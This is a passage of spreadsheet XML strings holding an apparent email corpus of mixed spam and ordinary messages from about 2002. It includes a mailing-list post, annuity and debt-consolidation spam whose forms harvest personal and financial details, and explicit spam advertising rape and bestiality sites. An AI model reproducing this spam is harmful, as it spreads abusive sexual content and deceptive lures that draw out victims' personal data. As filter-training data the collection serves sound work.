  "Whether it's a simple speeding ticket or an extensive Child &lt;BR&gt;
   Custody Case, we cover all 26 areas of the legal system." &lt;BR&gt;&lt;BR&gt;
      &lt;LI&gt; &lt;b&gt;Free&lt;/b&gt; Court Appearances on Your Behalf &lt;BR&gt;
      &lt;LI&gt;&lt;b&gt;Unlimited Phone&lt;/b&gt; Consultations &lt;BR&gt;
      &lt;LI&gt; Review of ALL Your Legal Documents &amp; Contracts &lt;BR&gt;
      &lt;LI&gt; Take Care of &lt;b&gt;Credit Problems &lt;/b&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
  &lt;font size=3D"5"&gt;
 And that is just the &lt;i&gt;TIP&lt;/i&gt; of the iceberg! &lt;BR&gt;&lt;BR&gt;
 CLICK &lt;a href=3D"http://www.severoffer.com/whatif/"&gt;HERE &lt;/a&gt;
 to Get Your&lt;BR&gt; &lt;b&gt;FREE&lt;/b&gt; Consultation Today  !!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;=
 &lt;br&gt;&lt;br&gt;
 &lt;DIV align=3Dcenter&gt;&lt;/DIV&gt;&lt;/A&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;DIV align=3Dcenter&gt;&lt;BR&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Show-and-tell nearly extinct because it might hurt children's
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423194,1717/
 Date: 2002-10-01T08:34:11+01:00
 (St. Petersburg Times)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: hi
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 I'm new to the list.
 I wanted to find out who tried recompiling a working apt rpm for (null) or 
 psyche.  I would like to get good GStreamer packages done by monday when 
 it's released.
 BTW, in the archive I saw some posts regarding the GStreamer repository.  
 I'm not sure why they were posted on this list ;) In any case, I'm the rpm 
 maintainer, so if you have any questions, feel free to ask.
 I was trying to get an updated apt rpm from http://dave.cridland.net/, but 
 the http port is closed.  Dave, if you're reading this, please let me know 
 where I can get the updated rpm.
 Thanks,
 Thomas
 -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 Just like you said
 you leave my life
 I'm better off dead
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apple Switch parodies
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/24.html
 Date: 2002-09-24T02:31:20-08:00
 This Monkey Switch Ad is too funny. Huge smile on my face. :-) It was the 
 winner of a competition MacRumors had set up. (Via Nathan)...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 5% Guaranteed for Eight Years
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_81109_01C25FF9.832EE820
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Pocket the newest 8 year annuity!	 Pocket the newest 8 year
 annuity!	
  	 ...from Safe Harbor Financial	
  	5% Guaranteed for 8 Years (effective yield)	 
  	8 Year Surrender Period	  	 Please fax back contracts with
 a copy of your insurance
 license to 215-564-0155.
 Click Here to Contract &lt;http://iiq.us/images/sh/0903/sh_mony_app.pdf&gt;  	
  	Issued to Age 90	 
  	A Rated Company	 
  	Alternative 10 Year Guaranteed Plan	 
 Call today for more information!
 - or -
 Please fill out the form below for more information	 
 Name:	 	  	
 Address:	 	 
 City:	       State:       Zip:  	
 Phone:	       Fax:  	
 E-mail:	 	 
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt; 
 ------=_NextPart_000_81109_01C25FF9.832EE820
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;5% Guaranteed for Eight Years&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#006600"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#006600"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-101a.jpg" alt=3D"Pocket the =
 newest 8 year annuity!" width=3D"275" height=3D"161"&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;img src=3D"http://iiq.us/Images/SH/0903/20020903-102a.jpg" =
 alt=3D"Pocket the newest 8 year annuity!" width=3D"275" =
 height=3D"161"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;img src=3D"http://iiq.us/Images/SH/0903/20020903-103a.jpg" =
 width=3D"275" height=3D"161"&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;img src=3D"http://iiq.us/Images/SH/0903/20020903-104a.jpg" =
 alt=3D"...from Safe Harbor Financial" width=3D"275" height=3D"161"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#006600"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
 						&lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"44" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-201.gif" width=3D"35" =
 height=3D"30"&gt;&lt;/td&gt;
                 &lt;td colspan=3D"3"&gt;&lt;font color=3D"#FFFFFF" size=3D"5"&gt;5% =
 Guaranteed for 8 Years &lt;font size=3D"3"&gt;(effective =
 yield)&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-202.gif" width=3D"35" =
 height=3D"30"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;font color=3D"#FFFFFF" size=3D"5"&gt;8 Year Surrender =
 Period&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"166" rowspan=3D"2" align=3D"center"&gt;
                   &lt;font color=3D"#FFFFFF" size=3D"1"&gt;Please fax back =
 contracts with&lt;br&gt;
                   a copy of your insurance&lt;br&gt;
                   license to 215-564-0155.&lt;br&gt;&lt;/font&gt;
                   &lt;a =
 href=3D"http://iiq.us/images/sh/0903/sh_mony_app.pdf"&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-3.gif" alt=3D"Click Here to =
 Contract" width=3D"146" height=3D"30" border=3D"0"&gt;&lt;/a&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-203.gif" width=3D"35" =
 height=3D"30"&gt;&lt;/td&gt;
                 &lt;td width=3D"303" colspan=3D'2'&gt;&lt;font color=3D"#FFFFFF" =
 size=3D"5"&gt;Issued to Age 90&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-204.gif" width=3D"35" =
 height=3D"30"&gt;&lt;/td&gt;
                 &lt;td colspan=3D"3"&gt;&lt;font color=3D"#FFFFFF" size=3D"5"&gt;A =
 Rated Company&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/Images/SH/0903/20020903-205.gif" width=3D"35" =
 height=3D"30"&gt;&lt;/td&gt;
                 &lt;td colspan=3D"3"&gt;&lt;font color=3D"#FFFFFF" =
 size=3D"5"&gt;Alternative 10 Year Guaranteed Plan&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td align=3D"center"&gt;&lt;br&gt;
             &lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Call today for more =
 information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/Images/SH/0903/20020903-4.gif" =
 width=3D"526" height=3D"67"&gt;&lt;br&gt;
             - or -&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"95%" border=3D"1"  align=3D"center" =
 cellpadding=3D"0" cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" =
 background=3D"http://iiq.us/Images/SH/0903/20020903-5.gif"&gt;
                       &lt;tr&gt;=20
                         &lt;td height=3D"19" colspan=3D"3" =
 align=3D"center"&gt;&lt;font size=3D"2" color=3D"#000000"&gt;&lt;b&gt;Please fill out =
 the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;&lt;/td&gt;
                         &lt;td width=3D"16%" rowspan=3D"6" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q3.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Address:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; State:=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Zip:=20
                           &lt;input type=3D"text" name=3D"zip" size=3D"5" =
 maxlength=3D"5"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"20"&gt;
                           &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Fax:=20
                           &lt;input type=3D"text" name=3D"fax" size=3D"20"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;input type=3D"text" name=3D"email" =
 size=3D"35"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td align=3D"center"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td&gt;
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jbranton@safeharborfinancial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"SafeHarbor Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/td&gt;
 				&lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We don't =
 want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_81109_01C25FF9.832EE820--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rape!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear juanzec ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;b&gt;&lt;font color="#FF0000" size="4"&gt;Rape Sex!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font size="5"&gt;&lt;a href="http://explicitattraction.com/~ea/rapecentral/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;
 &lt;br&gt;
 =============================================================&lt;/p&gt;
 &lt;p&gt;Do you like sexy animals doing the wild thing? We have the super hot content on the Internet!&lt;br&gt;
 This is the site you have heard about. Rated the number one adult site three years in a row!&lt;br&gt;
 - Thousands of pics from hardcore fucking, and cum shots to pet on girl.&lt;br&gt;
 - Thousands videos&lt;br&gt;
 So what are you waiting for?&lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://explicitattraction.com/~ea/funfarm/"&gt;&lt;b&gt;&lt;font size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;
 &lt;b&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;To not be on our &amp;quot;in house&amp;quot; address database&lt;br&gt;
 &lt;/font&gt;&lt;a href="http://explicitattraction.com/~ea/funfarm/takemeoff.html"&gt; &lt;font size="2"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;font size="2"&gt; and you will eliminated from future mailings.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [9^":}H&amp;*TG0BK5NKIYs5]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</si>
  <si>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 We Pay your bills :o) [k9lej]
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;CENTER&gt;
 &lt;table width=550 cellpadding=2 cellspacing=0 border=0 BGCOLOR=BLACK&gt;&lt;TR&gt;&lt;TD&gt;
 &lt;table width=550 cellpadding=3 cellspacing=3 border=0 BGCOLOR=#99cc99&gt;
 &lt;TR&gt;
 	&lt;td align=center valign=top WIDTH="550"&gt;
 	&lt;table width="500" cellpadding=4 cellspacing=0 border=0 BGCOLOR=BAFEBD&gt;
 	&lt;TR&gt;&lt;td align=center valign=top WIDTH="500"&gt;
 	&lt;font face=Verdana COLOR=blue size=2&gt;&lt;B&gt;Free Debt Consolidation Information
 	&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 	&lt;BR&gt;&lt;BR&gt;
 	&lt;font face=arial color=000000 size=5&gt;&lt;i&gt;&lt;b&gt;
 	Free 1 Minute Debt Consolidation Quote&lt;/i&gt;&lt;/B&gt;
 	&lt;BR&gt;
 	&lt;font face=arial color=0000AA size=1&gt;* Quickly and easily reduce Your Monthly Debt Payments Up To 60%&lt;/font&gt;
 	&lt;BR&gt;&lt;BR&gt;
 	&lt;font face=arial size=2 color=000033&gt;We are a 501c Non-Profit Organization&lt;/b&gt; that has helped 1000's consolidate their&lt;br&gt; debts into one easy affordable monthly payment. For a Free - No Obligation&lt;/b&gt;&lt;br&gt; quote to see how much money we can save you, please read on.&lt;/font&gt;
 	&lt;BR&gt;
 	&lt;FONT size=2 COLOR=blue FACE=ARIAL,HELVETICA&gt;&lt;i&gt;Become Debt Free...Get Your Life Back On Track!&lt;/I&gt;&lt;/font&gt;
 	&lt;BR&gt;	
 	&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt;All credit accepted and home 
 	ownership is NOT required.&lt;/font&gt;
 	&lt;BR&gt;
 	&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt; Not Another Loan To Dig You Deeper In To Debt!&lt;/font&gt;
 	&lt;BR&gt;&lt;BR&gt;
 	&lt;font face=Verdana color=#000000 size=3&gt;&lt;B&gt;If you have $4000 or more in debt, a trained professional&lt;br&gt; will negotiate with your creditors to:&lt;/font&gt;&lt;/b&gt;
 	&lt;BR&gt;
 	&lt;font face=Verdana color=#000000 size=-1&gt;
 	&lt;B&gt;Lower your monthly debt payments up to 60%&lt;B&gt;&lt;/font&gt;
 	&lt;BR&gt;
 	&lt;font face=Verdana color=#000000 size=-1&gt;
 	End creditor harassment&lt;/font&gt;
 	&lt;BR&gt;
 	&lt;font face=Verdana color=#000000 size=-1&gt;
 	Save thousands of dollars in interest and late charges&lt;/font&gt;
 	&lt;BR&gt;
 	&lt;font face=Verdana color=#000000 size=-1&gt;
 	Start improving your credit rating&lt;/font&gt;
 	&lt;BR&gt;
 	&lt;table width="500" cellpadding=4 cellspacing=0 border=0 BGCOLOR=BAFEBD&gt;
 	&lt;TR&gt;&lt;td align=center valign=top WIDTH="500"&gt;
 	&lt;font face=Verdana COLOR=blue size=2&gt;&lt;B&gt;Our QuickForm and Submit it for Your Free Analysis.
 	&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 	&lt;form name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post"&gt;
 	&lt;input type="HIDDEN" name="to" value="159379101"&gt;
 	&lt;input type="HIDDEN" name="charcount" value="450"&gt;																						      
 	&lt;input type="hidden" name="from" value="DNEW@DNEW.com"&gt;
 	&lt;input type="hidden" name="fromemail" value="DNEW@DNEW.com"&gt;
 	&lt;table width="500" cellpadding=2 cellspacing=0 border=0 BGCOLOR=#99BB99&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Name:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{name}}"&gt;
 		&lt;input type="text" size="21"  name="body" maxlength="30"&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Street Address:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{address}}"&gt;
 		&lt;input type="text" size="21" name="body" maxlength="30"&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;City:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{city}}"&gt;
 		&lt;input type="text" name="body" size="21" maxlength=30&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;State / Zip:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{state}}"&gt;
 		&lt;select name=body&gt;
 &lt;option value=""&gt;&lt;/option&gt;
 &lt;option value="AL"&gt; Alabama
 &lt;option value="AK"&gt; Alaska
 &lt;option value="AZ"&gt; Arizona
 &lt;option value="AR"&gt; Arkansas
 &lt;option value="CA"&gt; California
 &lt;option value="CO"&gt; Colorado
 &lt;option value="CT"&gt; Connecticut
 &lt;option value="DE"&gt; Delaware
 &lt;option value="DC"&gt; Dist of Columbia
 &lt;option value="FL"&gt; Florida
 &lt;option value="GA"&gt; Georgia
 &lt;option value="HI"&gt; Hawaii
 &lt;option value="ID"&gt; Idaho
 &lt;option value="IL"&gt; Illinois
 &lt;option value="IN"&gt; Indiana
 &lt;option value="IA"&gt; Iowa
 &lt;option value="KS"&gt; Kansas
 &lt;option value="KY"&gt; Kentucky
 &lt;option value="LA"&gt; Louisiana
 &lt;option value="ME"&gt; Maine
 &lt;option value="MD"&gt; Maryland
 &lt;option value="MA"&gt; Massachusetts
 &lt;option value="MI"&gt; Michigan
 &lt;option value="MN"&gt; Minnesota
 &lt;option value="MS"&gt; Mississippi
 &lt;option value="MO"&gt; Missouri
 &lt;option value="MT"&gt; Montana
 &lt;option value="NE"&gt; Nebraska
 &lt;option value="NV"&gt; Nevada
 &lt;option value="NH"&gt; New Hampshire
 &lt;option value="NJ"&gt; New Jersey
 &lt;option value="NM"&gt; New Mexico
 &lt;option value="NY"&gt; New York
 &lt;option value="NC"&gt; North Carolina
 &lt;option value="ND"&gt; North Dakota
 &lt;option value="OH"&gt; Ohio
 &lt;option value="OK"&gt; Oklahoma
 &lt;option value="OR"&gt; Oregon
 &lt;option value="PA"&gt; Pennsylvania
 &lt;option value="RI"&gt; Rhode Island
 &lt;option value="SC"&gt; South Carolina
 &lt;option value="SD"&gt; South Dakota
 &lt;option value="TN"&gt; Tennessee
 &lt;option value="TX"&gt; Texas
 &lt;option value="UT"&gt; Utah
 &lt;option value="VT"&gt; Vermont
 &lt;option value="VA"&gt; Virginia
 &lt;option value="WA"&gt; Washington
 &lt;option value="WV"&gt; West Virginia
 &lt;option value="WI"&gt; Wisconsin
 &lt;option value="WY"&gt; Wyoming &lt;/select&gt;
 &lt;input type="hidden" name="body" value="{{zip}}"&gt;
 &lt;input type=text name="body" size="5" maxlength=5&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Home Phone (with area code):
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{hphone}}"&gt;
 		&lt;input type="text" size="21" name="body" maxlength="19"&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Work Phone (with area code):
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{wphone}}"&gt;
 		&lt;input type="text" size="21" name="body" maxlength="19"&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Best Time To Contact:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{btime}}"&gt;
 		&lt;select size="1" name="body"&gt;
 		&lt;option value="Morning at Home"&gt;Morning at Home&lt;/option&gt;
 		&lt;option value="Morning at Work"&gt;Morning at Work&lt;/option&gt;
 		&lt;option value="Afternoon at Home"&gt;Afternoon at Home&lt;/option&gt;
 		&lt;option value="Afternoon at Work"&gt;Afternoon at Work&lt;/option&gt;
 		&lt;option value="Evening at Home"&gt;Evening at Home&lt;/option&gt;
 		&lt;option value="Evening at Work"&gt;Evening at Work &lt;/option&gt;
 		&lt;option value="Weekend"&gt;Weekend&lt;/option&gt;&lt;/select&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Email Address:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{email}}"&gt;
 		&lt;input type="text" name="body" size="21"&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;td align=right valign=CENTER WIDTH="250"&gt;
 		&lt;font face=Verdana color=#000000 size=-1&gt;Total Debt:
 		&lt;/TD&gt;
 		&lt;td align=left valign=CENTER WIDTH="250"&gt;
 		&lt;input type="hidden" name="body" value="{{tdebt}}"&gt;
 		&lt;select name=body&gt;
 		&lt;option value=""&gt;&lt;/option&gt;
 		&lt;option value="$4000 - $4999"&gt;$4000 - $4999
 		&lt;option value="$5000 - $7500"&gt;$5000 - $7500
 		&lt;option value="$7,501 - $10,000"&gt;$7,501 - $10,000
 		&lt;option value="$10,001 - $12,500"&gt;$10,001 - $12,500
 		&lt;option value="$12,501 - $15,000"&gt;$12,501 - $15,000
 		&lt;option value="$15,001 - $17,500"&gt;$15,001 - $17,500
 		&lt;option value="$17,501 - $20,000"&gt;$17,501 - $20,000
 		&lt;option value="$20,001 - $22,500"&gt;$20,001 - $22,500
 		&lt;option value="$22,501 - $25,000"&gt;$22,501 - $25,000
 		&lt;option value="$25,001 - $27,500"&gt;$25,001 - $27,500
 		&lt;option value="$27,501 - $30,000"&gt;$27,501 - $30,000
 		&lt;option value="$30,001 - $35,000"&gt;$30,001 - $35,000
 		&lt;option value="$35,001 - $40,000"&gt;$35,001 - $40,000
 		&lt;option value="$45,001 - $50,000"&gt;$45,001 - $50,000
 		&lt;option value="$50,000+"&gt;$50,000+&lt;/select&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/TABLE&gt;
 	&lt;input type="submit" value="Click Here to Submit"&gt;&lt;input type="reset" value="Reset"&gt;	
 	&lt;/FORM&gt;
 	&lt;font face="Verdana" size=-2 color=880000&gt;Please click the submit button
 	just once - process will take 30-60 seconds.&lt;/font&gt;
 	&lt;table width="500" cellpadding=4 cellspacing=0 border=0 BGCOLOR=BAFEBD&gt;
 	&lt;TR&gt;&lt;td align=center valign=top WIDTH="500"&gt;
 	&lt;font face=Verdana COLOR=blue size=2&gt;&lt;B&gt;Or, please reply with the following for your Free Analysis&lt;/B&gt;
 	&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;font face=Verdana COLOR=black size=2&gt;
 	&lt;table width="500" cellpadding=4 cellspacing=0 border=0 BGCOLOR=BAFEBD&gt;&lt;BR&gt;
 Name:&lt;BR&gt;
 Address:&lt;BR&gt;
 City:&lt;BR&gt;
 State:&lt;BR&gt;
 Zip:&lt;BR&gt;
 Home Phone:(___) ___-____&lt;BR&gt;
 Work Phone:(___) ___-____&lt;BR&gt;
 Best Time:&lt;BR&gt;
 Email:&lt;BR&gt;
 Total Debt:&lt;BR&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;
 &lt;BR&gt;To end mail reply to this Email with the subject &lt;B&gt;REMOVE&lt;/B&gt;
 &lt;/CENTER&gt;
 &lt;/html&gt;
 fabcncnrroumzcsg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Does Financial Freedom Interest You?
</t>
  </si>
  <si>
